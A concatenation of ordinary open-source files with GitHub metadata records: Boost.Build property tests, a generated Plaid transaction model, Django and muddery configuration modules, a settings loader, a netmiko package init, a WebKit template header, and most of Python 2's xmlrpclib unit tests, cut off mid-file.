# validate <rtti> : $(test-space) ;
# catch "Invalid property '<rtti>': No value specified for feature 'rtti'." ;
#
# try ;
# validate value : $(test-space) ;
# catch "value" is not a value of an implicit feature ;
#
#
# assert.result <rtti>on
# : remove free implicit : <toolset>gcc <define>foo <rtti>on : $(test-space) ;
#
# assert.result <include>a
# : select include : <include>a <toolset>gcc ;
#
# assert.result <include>a
# : select include bar : <include>a <toolset>gcc ;
#
# assert.result <include>a <toolset>gcc
# : select include <bar> <toolset> : <include>a <toolset>gcc ;
#
# assert.result <toolset>kylix <include>a
# : change <toolset>gcc <include>a : <toolset> kylix ;
#
# # Test ordinary properties
# assert.result
# : split-conditional <toolset>gcc
# ;
#
# # Test properties with ":"
# assert.result
# : split-conditional <define>FOO=A::B
# ;
#
# # Test conditional feature
# assert.result <toolset>gcc,<toolset-gcc:version>3.0 <define>FOO
# : split-conditional <toolset>gcc,<toolset-gcc:version>3.0:<define>FOO
# ;
#
# feature.finish-test property-test-temp ;
# }
#
|
{
"content_hash": "0becdb2355a5460332c518187bbd45e1",
"timestamp": "",
"source": "github",
"line_count": 645,
"max_line_length": 95,
"avg_line_length": 31.804651162790698,
"alnum_prop": 0.570927171687628,
"repo_name": "zjutjsj1004/third",
"id": "e49ff9c5fa94b2edc53a1922614619969e4f8ca4",
"size": "20853",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "boost/tools/build/src/build/property.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Assembly",
"bytes": "224158"
},
{
"name": "Batchfile",
"bytes": "33175"
},
{
"name": "C",
"bytes": "5576593"
},
{
"name": "C#",
"bytes": "41850"
},
{
"name": "C++",
"bytes": "179595990"
},
{
"name": "CMake",
"bytes": "28348"
},
{
"name": "CSS",
"bytes": "331303"
},
{
"name": "Cuda",
"bytes": "26521"
},
{
"name": "FORTRAN",
"bytes": "1856"
},
{
"name": "Groff",
"bytes": "1305458"
},
{
"name": "HTML",
"bytes": "159660377"
},
{
"name": "IDL",
"bytes": "15"
},
{
"name": "JavaScript",
"bytes": "285786"
},
{
"name": "Lex",
"bytes": "1290"
},
{
"name": "Makefile",
"bytes": "1202020"
},
{
"name": "Max",
"bytes": "37424"
},
{
"name": "Objective-C",
"bytes": "3674"
},
{
"name": "Objective-C++",
"bytes": "651"
},
{
"name": "PHP",
"bytes": "60249"
},
{
"name": "Perl",
"bytes": "37297"
},
{
"name": "Perl6",
"bytes": "2130"
},
{
"name": "Python",
"bytes": "1833677"
},
{
"name": "QML",
"bytes": "613"
},
{
"name": "QMake",
"bytes": "17385"
},
{
"name": "Rebol",
"bytes": "372"
},
{
"name": "Shell",
"bytes": "1144162"
},
{
"name": "Tcl",
"bytes": "1205"
},
{
"name": "TeX",
"bytes": "38313"
},
{
"name": "XSLT",
"bytes": "564356"
},
{
"name": "Yacc",
"bytes": "20341"
}
],
"symlink_target": ""
}
|
"""
The Plaid API
The Plaid REST API. Please see https://plaid.com/docs/api for more details. # noqa: E501
Generated by: https://openapi-generator.tech
"""
import re # noqa: F401
import sys # noqa: F401
from plaid.model_utils import ( # noqa: F401
ApiTypeError,
ModelComposed,
ModelNormal,
ModelSimple,
cached_property,
change_keys_js_to_python,
convert_js_args_to_python_args,
date,
datetime,
file_type,
none_type,
validate_get_composed_info,
)
def lazy_import():
from plaid.model.enrich_transaction_direction import EnrichTransactionDirection
globals()['EnrichTransactionDirection'] = EnrichTransactionDirection
class ClientProvidedTransaction(ModelNormal):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
Attributes:
allowed_values (dict): The key is the tuple path to the attribute
          and for var_name this is (var_name,). The value is a dict
with a capitalized key describing the allowed value and an allowed
value. These dicts store the allowed enum values.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
discriminator_value_class_map (dict): A dict to go from the discriminator
variable value to the discriminator class name.
validations (dict): The key is the tuple path to the attribute
          and for var_name this is (var_name,). The value is a dict
that stores validations for max_length, min_length, max_items,
min_items, exclusive_maximum, inclusive_maximum, exclusive_minimum,
inclusive_minimum, and regex.
additional_properties_type (tuple): A tuple of classes accepted
as additional properties values.
"""
allowed_values = {
}
validations = {
}
@cached_property
def additional_properties_type():
"""
This must be a method because a model may have properties that are
of type self, this must run after the class is loaded
"""
lazy_import()
return (bool, date, datetime, dict, float, int, list, str, none_type,) # noqa: E501
_nullable = False
@cached_property
def openapi_types():
"""
This must be a method because a model may have properties that are
of type self, this must run after the class is loaded
Returns
openapi_types (dict): The key is attribute name
and the value is attribute type.
"""
lazy_import()
return {
'id': (str,), # noqa: E501
'description': (str,), # noqa: E501
'amount': (float,), # noqa: E501
'iso_currency_code': (str,), # noqa: E501
'direction': (EnrichTransactionDirection,), # noqa: E501
}
@cached_property
def discriminator():
return None
attribute_map = {
'id': 'id', # noqa: E501
'description': 'description', # noqa: E501
'amount': 'amount', # noqa: E501
'iso_currency_code': 'iso_currency_code', # noqa: E501
'direction': 'direction', # noqa: E501
}
_composed_schemas = {}
required_properties = set([
'_data_store',
'_check_type',
'_spec_property_naming',
'_path_to_item',
'_configuration',
'_visited_composed_classes',
])
@convert_js_args_to_python_args
def __init__(self, id, description, amount, iso_currency_code, *args, **kwargs): # noqa: E501
"""ClientProvidedTransaction - a model defined in OpenAPI
Args:
id (str): A unique ID for the transaction used to help you tie data back to your systems.
description (str): The raw description of the transaction.
amount (float): The absolute value of the transaction (>= 0)
iso_currency_code (str): The ISO-4217 currency code of the transaction, e.g., USD.
Keyword Args:
_check_type (bool): if True, values for parameters in openapi_types
will be type checked and a TypeError will be
raised if the wrong type is input.
Defaults to True
_path_to_item (tuple/list): This is a list of keys or values to
drill down to the model in received_data
when deserializing a response
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_configuration (Configuration): the instance to use when
deserializing a file_type parameter.
If passed, type conversion is attempted
If omitted no type conversion is done.
_visited_composed_classes (tuple): This stores a tuple of
classes that we have traveled through so that
if we see that class again we will not use its
discriminator again.
When traveling through a discriminator, the
composed schema that is
                traveled through is added to this set.
For example if Animal has a discriminator
petType and we pass in "Dog", and the class Dog
allOf includes Animal, we move through Animal
once using the discriminator, and pick Dog.
Then in Dog, we will make an instance of the
Animal class but this time we won't travel
through its discriminator because we passed in
_visited_composed_classes = (Animal,)
direction (EnrichTransactionDirection): [optional] # noqa: E501
"""
_check_type = kwargs.pop('_check_type', True)
_spec_property_naming = kwargs.pop('_spec_property_naming', False)
_path_to_item = kwargs.pop('_path_to_item', ())
_configuration = kwargs.pop('_configuration', None)
_visited_composed_classes = kwargs.pop('_visited_composed_classes', ())
if args:
raise ApiTypeError(
"Invalid positional arguments=%s passed to %s. Remove those invalid positional arguments." % (
args,
self.__class__.__name__,
),
path_to_item=_path_to_item,
valid_classes=(self.__class__,),
)
self._data_store = {}
self._check_type = _check_type
self._spec_property_naming = _spec_property_naming
self._path_to_item = _path_to_item
self._configuration = _configuration
self._visited_composed_classes = _visited_composed_classes + (self.__class__,)
self.id = id
self.description = description
self.amount = amount
self.iso_currency_code = iso_currency_code
for var_name, var_value in kwargs.items():
if var_name not in self.attribute_map and \
self._configuration is not None and \
self._configuration.discard_unknown_keys and \
self.additional_properties_type is None:
# discard variable.
continue
setattr(self, var_name, var_value)
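# Illustrative usage sketch (not part of the generated file; the field values
# below are hypothetical): constructing the model with its four required
# arguments, as declared in __init__ above.
#
#     txn = ClientProvidedTransaction(
#         id='tx-0001',
#         description='Coffee shop purchase',
#         amount=4.25,
#         iso_currency_code='USD',
#     )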
|
{
"content_hash": "666c29437d0b5094b1dcc364d9cf5899",
"timestamp": "",
"source": "github",
"line_count": 194,
"max_line_length": 110,
"avg_line_length": 40.78350515463917,
"alnum_prop": 0.5664812942366027,
"repo_name": "plaid/plaid-python",
"id": "eb34c6a5650f9f9c26d920aa07ef3d85f8bfb2a8",
"size": "7912",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "plaid/model/client_provided_transaction.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Dockerfile",
"bytes": "323"
},
{
"name": "Makefile",
"bytes": "622"
},
{
"name": "Mustache",
"bytes": "125163"
},
{
"name": "Python",
"bytes": "9342874"
}
],
"symlink_target": ""
}
|
from django.conf.urls import patterns, url
from storybase_taxonomy.views import CategoryExplorerRedirectView, TagStoryListView
urlpatterns = patterns('',
url(r'topics/(?P<slug>[0-9a-z-]+)/$',
CategoryExplorerRedirectView.as_view(),
name='topic_stories'),
url(r'tags/(?P<slug>[0-9a-z-]+)/$',
TagStoryListView.as_view(),
name='tag_stories'),
)
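# Illustrative sketch (hypothetical slug value): because both patterns are
# named, they can be reversed, e.g.:
#
#     from django.core.urlresolvers import reverse
#     reverse('topic_stories', kwargs={'slug': 'education'})
#     # -> 'topics/education/' relative to where this URLconf is included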
|
{
"content_hash": "d1d366c6146ece6c224a6af9bdc9d9d5",
"timestamp": "",
"source": "github",
"line_count": 12,
"max_line_length": 83,
"avg_line_length": 32.083333333333336,
"alnum_prop": 0.6545454545454545,
"repo_name": "denverfoundation/storybase",
"id": "078317e70972b11746d9b1b8719b1c8f20ce5549",
"size": "385",
"binary": false,
"copies": "1",
"ref": "refs/heads/develop",
"path": "apps/storybase_taxonomy/urls.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "285649"
},
{
"name": "Cucumber",
"bytes": "176820"
},
{
"name": "HTML",
"bytes": "286197"
},
{
"name": "JavaScript",
"bytes": "1623541"
},
{
"name": "Makefile",
"bytes": "1006"
},
{
"name": "Python",
"bytes": "3020016"
},
{
"name": "Shell",
"bytes": "23932"
}
],
"symlink_target": ""
}
|
"""
This module defines available model types.
"""
from __future__ import print_function
from muddery.worlddata.data_sets import DataSets as BaseDataSets
from muddery.worlddata.data_handler import DataHandler, SystemDataHandler, LocalizedStringsHandler
class DataSets(BaseDataSets):
def at_creation(self):
"""
You can add custom data handlers in this method.
Returns:
None
"""
super(DataSets, self).at_creation()
# self.add_data_handler(self.object_additional_data, DataHandler("custom_model"))
|
{
"content_hash": "9858bad7ad22b2668461d63b96f68691",
"timestamp": "",
"source": "github",
"line_count": 21,
"max_line_length": 98,
"avg_line_length": 26.904761904761905,
"alnum_prop": 0.6938053097345133,
"repo_name": "MarsZone/DreamLand",
"id": "ba803685e9e20fb3f7ed6259dbbe34931af6af95",
"size": "565",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "demo/worlddata/data_sets.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Batchfile",
"bytes": "106"
},
{
"name": "CSS",
"bytes": "90990"
},
{
"name": "Emacs Lisp",
"bytes": "2734"
},
{
"name": "HTML",
"bytes": "204486"
},
{
"name": "JavaScript",
"bytes": "157093"
},
{
"name": "Python",
"bytes": "3191395"
},
{
"name": "Shell",
"bytes": "4237"
}
],
"symlink_target": ""
}
|
"""
jobber.conf
~~~~~~~~~~~
Exposes a `_Settings` instance with applied overrides from local.py.
"""
from jobber.conf import default as default_settings
try:
from jobber.conf import local as local_settings
except ImportError:
local_settings = None
def _make_dict(module):
"""Transforms a module into a `dict` containing all the names that the
module defines.
"""
if not module:
return {}
return {name: getattr(module, name) for name in dir(module)}
_default = _make_dict(default_settings)
_local = _make_dict(local_settings)
class _Settings(object):
"""Placeholder class for settings."""
def __init__(self, *args):
for setting in args:
if setting: self.apply(setting)
def apply(self, settings):
for key, value in settings.iteritems():
if key == key.upper():
setattr(self, key, value)
# Expose a global `settings` property.
settings = _Settings(_default, _local)
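# Illustrative sketch (hypothetical setting names): only upper-case names are
# applied by _Settings.apply(), and values from local.py override those from
# default.py because _local is passed after _default:
#
#     from jobber.conf import settings
#     # with DEBUG = False in default.py and DEBUG = True in local.py:
#     # settings.DEBUG  -> True
#     # lower-case names in either module are ignored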
|
{
"content_hash": "c33e8efc2837e03c9ea99b180ac3bed5",
"timestamp": "",
"source": "github",
"line_count": 43,
"max_line_length": 74,
"avg_line_length": 22.790697674418606,
"alnum_prop": 0.6418367346938776,
"repo_name": "hackcyprus/jobber",
"id": "1ce5979967385308d94443d1932ceddd07a79642",
"size": "980",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "jobber/conf/__init__.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "41661"
},
{
"name": "JavaScript",
"bytes": "6949"
},
{
"name": "Python",
"bytes": "117838"
},
{
"name": "Ruby",
"bytes": "748"
},
{
"name": "Shell",
"bytes": "269"
}
],
"symlink_target": ""
}
|
from __future__ import unicode_literals
from netmiko.brocade.brocade_nos_ssh import BrocadeNosSSH
from netmiko.brocade.brocade_fastiron import BrocadeFastironSSH
from netmiko.brocade.brocade_fastiron import BrocadeFastironTelnet
from netmiko.brocade.brocade_netiron import BrocadeNetironSSH
from netmiko.brocade.brocade_netiron import BrocadeNetironTelnet
__all__ = ['BrocadeNosSSH', 'BrocadeFastironSSH', 'BrocadeFastironTelnet',
'BrocadeNetironSSH', 'BrocadeNetironTelnet']
|
{
"content_hash": "170a24f74bd3873b7776416fb1a3574a",
"timestamp": "",
"source": "github",
"line_count": 9,
"max_line_length": 74,
"avg_line_length": 54.22222222222222,
"alnum_prop": 0.8258196721311475,
"repo_name": "isidroamv/netmiko",
"id": "c841d136c88de259854bd8f933864f25a2ca3f46",
"size": "488",
"binary": false,
"copies": "1",
"ref": "refs/heads/develop",
"path": "netmiko/brocade/__init__.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "244012"
},
{
"name": "Shell",
"bytes": "10760"
}
],
"symlink_target": ""
}
|
#!/usr/bin/env python
#
# Copyright (c) 2014, 2016 Apple Inc. All rights reserved.
# Copyright (c) 2014 University of Washington. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY APPLE INC. AND ITS CONTRIBUTORS ``AS IS''
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL APPLE INC. OR ITS CONTRIBUTORS
# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF
# THE POSSIBILITY OF SUCH DAMAGE.
# Generator templates, which can be filled with string.Template.
# Following are classes that fill the templates from the typechecked model.
class GeneratorTemplates:
CopyrightBlock = (
"""
// DO NOT EDIT THIS FILE. It is automatically generated from ${inputFilename}
// by the script: Source/JavaScriptCore/inspector/scripts/generate-inspector-protocol-bindings.py""")
|
{
"content_hash": "c2eed45a02467e96007bcb4a29ca9291",
"timestamp": "",
"source": "github",
"line_count": 36,
"max_line_length": 101,
"avg_line_length": 50.166666666666664,
"alnum_prop": 0.7757475083056479,
"repo_name": "hxxft/lynx-native",
"id": "891681ffd71f549576cff1aa50202e129b92ee88",
"size": "3289",
"binary": false,
"copies": "4",
"ref": "refs/heads/master",
"path": "Core/third_party/JavaScriptCore/inspector/scripts/codegen/generator_templates.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "C",
"bytes": "8846"
},
{
"name": "C++",
"bytes": "1644015"
},
{
"name": "CMake",
"bytes": "16371"
},
{
"name": "HTML",
"bytes": "132541"
},
{
"name": "Java",
"bytes": "545560"
},
{
"name": "JavaScript",
"bytes": "6469482"
},
{
"name": "Objective-C",
"bytes": "58832"
},
{
"name": "Objective-C++",
"bytes": "174916"
},
{
"name": "Python",
"bytes": "55792"
},
{
"name": "Ruby",
"bytes": "1520"
},
{
"name": "Shell",
"bytes": "515"
},
{
"name": "TypeScript",
"bytes": "1851"
},
{
"name": "Vue",
"bytes": "37901"
}
],
"symlink_target": ""
}
|
import base64
import datetime
import sys
import time
import unittest
import xmlrpclib
import SimpleXMLRPCServer
import mimetools
import httplib
import socket
import StringIO
import os
import re
from test import test_support
try:
import threading
except ImportError:
threading = None
try:
unicode
except NameError:
have_unicode = False
else:
have_unicode = True
alist = [{'astring': 'foo@bar.baz.spam',
'afloat': 7283.43,
'anint': 2**20,
'ashortlong': 2L,
'anotherlist': ['.zyx.41'],
'abase64': xmlrpclib.Binary("my dog has fleas"),
'boolean': xmlrpclib.False,
'unicode': u'\u4000\u6000\u8000',
u'ukey\u4000': 'regular value',
'datetime1': xmlrpclib.DateTime('20050210T11:41:23'),
'datetime2': xmlrpclib.DateTime(
(2005, 02, 10, 11, 41, 23, 0, 1, -1)),
'datetime3': xmlrpclib.DateTime(
datetime.datetime(2005, 02, 10, 11, 41, 23)),
}]
class XMLRPCTestCase(unittest.TestCase):
def test_dump_load(self):
self.assertEquals(alist,
xmlrpclib.loads(xmlrpclib.dumps((alist,)))[0][0])
def test_dump_bare_datetime(self):
# This checks that an unwrapped datetime.date object can be handled
# by the marshalling code. This can't be done via test_dump_load()
# since with use_datetime set to 1 the unmarshaller would create
# datetime objects for the 'datetime[123]' keys as well
dt = datetime.datetime(2005, 02, 10, 11, 41, 23)
s = xmlrpclib.dumps((dt,))
(newdt,), m = xmlrpclib.loads(s, use_datetime=1)
self.assertEquals(newdt, dt)
self.assertEquals(m, None)
(newdt,), m = xmlrpclib.loads(s, use_datetime=0)
self.assertEquals(newdt, xmlrpclib.DateTime('20050210T11:41:23'))
def test_datetime_before_1900(self):
# same as before but with a date before 1900
dt = datetime.datetime(1, 02, 10, 11, 41, 23)
s = xmlrpclib.dumps((dt,))
(newdt,), m = xmlrpclib.loads(s, use_datetime=1)
self.assertEquals(newdt, dt)
self.assertEquals(m, None)
(newdt,), m = xmlrpclib.loads(s, use_datetime=0)
self.assertEquals(newdt, xmlrpclib.DateTime('00010210T11:41:23'))
def test_cmp_datetime_DateTime(self):
now = datetime.datetime.now()
dt = xmlrpclib.DateTime(now.timetuple())
self.assertTrue(dt == now)
self.assertTrue(now == dt)
then = now + datetime.timedelta(seconds=4)
self.assertTrue(then >= dt)
self.assertTrue(dt < then)
def test_bug_1164912 (self):
d = xmlrpclib.DateTime()
((new_d,), dummy) = xmlrpclib.loads(xmlrpclib.dumps((d,),
methodresponse=True))
self.assertIsInstance(new_d.value, str)
# Check that the output of dumps() is still an 8-bit string
s = xmlrpclib.dumps((new_d,), methodresponse=True)
self.assertIsInstance(s, str)
def test_newstyle_class(self):
class T(object):
pass
t = T()
t.x = 100
t.y = "Hello"
((t2,), dummy) = xmlrpclib.loads(xmlrpclib.dumps((t,)))
self.assertEquals(t2, t.__dict__)
def test_dump_big_long(self):
self.assertRaises(OverflowError, xmlrpclib.dumps, (2L**99,))
def test_dump_bad_dict(self):
self.assertRaises(TypeError, xmlrpclib.dumps, ({(1,2,3): 1},))
def test_dump_recursive_seq(self):
l = [1,2,3]
t = [3,4,5,l]
l.append(t)
self.assertRaises(TypeError, xmlrpclib.dumps, (l,))
def test_dump_recursive_dict(self):
d = {'1':1, '2':1}
t = {'3':3, 'd':d}
d['t'] = t
self.assertRaises(TypeError, xmlrpclib.dumps, (d,))
def test_dump_big_int(self):
if sys.maxint > 2L**31-1:
self.assertRaises(OverflowError, xmlrpclib.dumps,
(int(2L**34),))
xmlrpclib.dumps((xmlrpclib.MAXINT, xmlrpclib.MININT))
self.assertRaises(OverflowError, xmlrpclib.dumps, (xmlrpclib.MAXINT+1,))
self.assertRaises(OverflowError, xmlrpclib.dumps, (xmlrpclib.MININT-1,))
def dummy_write(s):
pass
m = xmlrpclib.Marshaller()
m.dump_int(xmlrpclib.MAXINT, dummy_write)
m.dump_int(xmlrpclib.MININT, dummy_write)
self.assertRaises(OverflowError, m.dump_int, xmlrpclib.MAXINT+1, dummy_write)
self.assertRaises(OverflowError, m.dump_int, xmlrpclib.MININT-1, dummy_write)
def test_dump_none(self):
value = alist + [None]
arg1 = (alist + [None],)
strg = xmlrpclib.dumps(arg1, allow_none=True)
self.assertEquals(value,
xmlrpclib.loads(strg)[0][0])
self.assertRaises(TypeError, xmlrpclib.dumps, (arg1,))
def test_default_encoding_issues(self):
# SF bug #1115989: wrong decoding in '_stringify'
utf8 = """<?xml version='1.0' encoding='iso-8859-1'?>
<params>
<param><value>
<string>abc \x95</string>
</value></param>
<param><value>
<struct>
<member>
<name>def \x96</name>
<value><string>ghi \x97</string></value>
</member>
</struct>
</value></param>
</params>
"""
# sys.setdefaultencoding() normally doesn't exist after site.py is
# loaded. Import a temporary fresh copy to get access to it
# but then restore the original copy to avoid messing with
# other potentially modified sys module attributes
old_encoding = sys.getdefaultencoding()
with test_support.CleanImport('sys'):
import sys as temp_sys
temp_sys.setdefaultencoding("iso-8859-1")
try:
(s, d), m = xmlrpclib.loads(utf8)
finally:
temp_sys.setdefaultencoding(old_encoding)
items = d.items()
if have_unicode:
self.assertEquals(s, u"abc \x95")
self.assertIsInstance(s, unicode)
self.assertEquals(items, [(u"def \x96", u"ghi \x97")])
self.assertIsInstance(items[0][0], unicode)
self.assertIsInstance(items[0][1], unicode)
else:
self.assertEquals(s, "abc \xc2\x95")
self.assertEquals(items, [("def \xc2\x96", "ghi \xc2\x97")])
class HelperTestCase(unittest.TestCase):
def test_escape(self):
self.assertEqual(xmlrpclib.escape("a&b"), "a&b")
self.assertEqual(xmlrpclib.escape("a<b"), "a<b")
self.assertEqual(xmlrpclib.escape("a>b"), "a>b")
class FaultTestCase(unittest.TestCase):
def test_repr(self):
f = xmlrpclib.Fault(42, 'Test Fault')
self.assertEqual(repr(f), "<Fault 42: 'Test Fault'>")
self.assertEqual(repr(f), str(f))
def test_dump_fault(self):
f = xmlrpclib.Fault(42, 'Test Fault')
s = xmlrpclib.dumps((f,))
(newf,), m = xmlrpclib.loads(s)
self.assertEquals(newf, {'faultCode': 42, 'faultString': 'Test Fault'})
self.assertEquals(m, None)
s = xmlrpclib.Marshaller().dumps(f)
self.assertRaises(xmlrpclib.Fault, xmlrpclib.loads, s)
class DateTimeTestCase(unittest.TestCase):
def test_default(self):
t = xmlrpclib.DateTime()
def test_time(self):
d = 1181399930.036952
t = xmlrpclib.DateTime(d)
self.assertEqual(str(t), time.strftime("%Y%m%dT%H:%M:%S", time.localtime(d)))
def test_time_tuple(self):
d = (2007,6,9,10,38,50,5,160,0)
t = xmlrpclib.DateTime(d)
self.assertEqual(str(t), '20070609T10:38:50')
def test_time_struct(self):
d = time.localtime(1181399930.036952)
t = xmlrpclib.DateTime(d)
self.assertEqual(str(t), time.strftime("%Y%m%dT%H:%M:%S", d))
def test_datetime_datetime(self):
d = datetime.datetime(2007,1,2,3,4,5)
t = xmlrpclib.DateTime(d)
self.assertEqual(str(t), '20070102T03:04:05')
def test_repr(self):
d = datetime.datetime(2007,1,2,3,4,5)
t = xmlrpclib.DateTime(d)
val ="<DateTime '20070102T03:04:05' at %x>" % id(t)
self.assertEqual(repr(t), val)
def test_decode(self):
d = ' 20070908T07:11:13 '
t1 = xmlrpclib.DateTime()
t1.decode(d)
tref = xmlrpclib.DateTime(datetime.datetime(2007,9,8,7,11,13))
self.assertEqual(t1, tref)
t2 = xmlrpclib._datetime(d)
self.assertEqual(t1, tref)
class BinaryTestCase(unittest.TestCase):
def test_default(self):
t = xmlrpclib.Binary()
self.assertEqual(str(t), '')
def test_string(self):
d = '\x01\x02\x03abc123\xff\xfe'
t = xmlrpclib.Binary(d)
self.assertEqual(str(t), d)
def test_decode(self):
d = '\x01\x02\x03abc123\xff\xfe'
de = base64.encodestring(d)
t1 = xmlrpclib.Binary()
t1.decode(de)
self.assertEqual(str(t1), d)
t2 = xmlrpclib._binary(de)
self.assertEqual(str(t2), d)
ADDR = PORT = URL = None
# The evt is set twice. First when the server is ready to serve.
# Second when the server has been shutdown. The user must clear
# the event after it has been set the first time to catch the second set.
def http_server(evt, numrequests, requestHandler=None):
class TestInstanceClass:
def div(self, x, y):
return x // y
def _methodHelp(self, name):
if name == 'div':
return 'This is the div function'
def my_function():
'''This is my function'''
return True
class MyXMLRPCServer(SimpleXMLRPCServer.SimpleXMLRPCServer):
def get_request(self):
            # Ensure the socket is always blocking. On Linux, socket
# attributes are not inherited like they are on *BSD and Windows.
s, port = self.socket.accept()
s.setblocking(True)
return s, port
if not requestHandler:
requestHandler = SimpleXMLRPCServer.SimpleXMLRPCRequestHandler
serv = MyXMLRPCServer(("localhost", 0), requestHandler,
logRequests=False, bind_and_activate=False)
try:
serv.socket.settimeout(3)
serv.server_bind()
global ADDR, PORT, URL
ADDR, PORT = serv.socket.getsockname()
#connect to IP address directly. This avoids socket.create_connection()
        #trying to connect to "localhost" using all address families, which
#causes slowdown e.g. on vista which supports AF_INET6. The server listens
#on AF_INET only.
URL = "http://%s:%d"%(ADDR, PORT)
serv.server_activate()
serv.register_introspection_functions()
serv.register_multicall_functions()
serv.register_function(pow)
serv.register_function(lambda x,y: x+y, 'add')
serv.register_function(my_function)
serv.register_instance(TestInstanceClass())
evt.set()
# handle up to 'numrequests' requests
while numrequests > 0:
serv.handle_request()
numrequests -= 1
except socket.timeout:
pass
finally:
serv.socket.close()
PORT = None
evt.set()
def http_multi_server(evt, numrequests, requestHandler=None):
class TestInstanceClass:
def div(self, x, y):
return x // y
def _methodHelp(self, name):
if name == 'div':
return 'This is the div function'
def my_function():
'''This is my function'''
return True
class MyXMLRPCServer(SimpleXMLRPCServer.MultiPathXMLRPCServer):
def get_request(self):
            # Ensure the socket is always blocking. On Linux, socket
# attributes are not inherited like they are on *BSD and Windows.
s, port = self.socket.accept()
s.setblocking(True)
return s, port
if not requestHandler:
requestHandler = SimpleXMLRPCServer.SimpleXMLRPCRequestHandler
class MyRequestHandler(requestHandler):
rpc_paths = []
serv = MyXMLRPCServer(("localhost", 0), MyRequestHandler,
logRequests=False, bind_and_activate=False)
serv.socket.settimeout(3)
serv.server_bind()
try:
global ADDR, PORT, URL
ADDR, PORT = serv.socket.getsockname()
#connect to IP address directly. This avoids socket.create_connection()
        #trying to connect to "localhost" using all address families, which
#causes slowdown e.g. on vista which supports AF_INET6. The server listens
#on AF_INET only.
URL = "http://%s:%d"%(ADDR, PORT)
serv.server_activate()
paths = ["/foo", "/foo/bar"]
for path in paths:
d = serv.add_dispatcher(path, SimpleXMLRPCServer.SimpleXMLRPCDispatcher())
d.register_introspection_functions()
d.register_multicall_functions()
serv.get_dispatcher(paths[0]).register_function(pow)
serv.get_dispatcher(paths[1]).register_function(lambda x,y: x+y, 'add')
evt.set()
# handle up to 'numrequests' requests
while numrequests > 0:
serv.handle_request()
numrequests -= 1
except socket.timeout:
pass
finally:
serv.socket.close()
PORT = None
evt.set()
# This function prevents errors like:
# <ProtocolError for localhost:57527/RPC2: 500 Internal Server Error>
def is_unavailable_exception(e):
'''Returns True if the given ProtocolError is the product of a server-side
exception caused by the 'temporarily unavailable' response sometimes
given by operations on non-blocking sockets.'''
# sometimes we get a -1 error code and/or empty headers
try:
if e.errcode == -1 or e.headers is None:
return True
exc_mess = e.headers.get('X-exception')
except AttributeError:
# Ignore socket.errors here.
exc_mess = str(e)
if exc_mess and 'temporarily unavailable' in exc_mess.lower():
return True
return False
@unittest.skipUnless(threading, 'Threading required for this test.')
class BaseServerTestCase(unittest.TestCase):
requestHandler = None
request_count = 1
threadFunc = staticmethod(http_server)
def setUp(self):
# enable traceback reporting
SimpleXMLRPCServer.SimpleXMLRPCServer._send_traceback_header = True
self.evt = threading.Event()
# start server thread to handle requests
serv_args = (self.evt, self.request_count, self.requestHandler)
threading.Thread(target=self.threadFunc, args=serv_args).start()
# wait for the server to be ready
self.evt.wait(10)
self.evt.clear()
def tearDown(self):
# wait on the server thread to terminate
self.evt.wait(10)
# disable traceback reporting
SimpleXMLRPCServer.SimpleXMLRPCServer._send_traceback_header = False
# NOTE: The tests in SimpleServerTestCase will ignore failures caused by
# "temporarily unavailable" exceptions raised in SimpleXMLRPCServer. This
# condition occurs infrequently on some platforms, frequently on others, and
# is apparently caused by using SimpleXMLRPCServer with a non-blocking socket.
# If the server class is updated at some point in the future to handle this
# situation more gracefully, these tests should be modified appropriately.
class SimpleServerTestCase(BaseServerTestCase):
def test_simple1(self):
try:
p = xmlrpclib.ServerProxy(URL)
self.assertEqual(p.pow(6,8), 6**8)
except (xmlrpclib.ProtocolError, socket.error), e:
# ignore failures due to non-blocking socket 'unavailable' errors
if not is_unavailable_exception(e):
# protocol error; provide additional information in test output
self.fail("%s\n%s" % (e, getattr(e, "headers", "")))
def test_nonascii(self):
start_string = 'P\N{LATIN SMALL LETTER Y WITH CIRCUMFLEX}t'
end_string = 'h\N{LATIN SMALL LETTER O WITH HORN}n'
try:
p = xmlrpclib.ServerProxy(URL)
self.assertEqual(p.add(start_string, end_string),
start_string + end_string)
except (xmlrpclib.ProtocolError, socket.error) as e:
# ignore failures due to non-blocking socket unavailable errors.
if not is_unavailable_exception(e):
# protocol error; provide additional information in test output
self.fail("%s\n%s" % (e, getattr(e, "headers", "")))
# [ch] The test 404 is causing lots of false alarms.
def XXXtest_404(self):
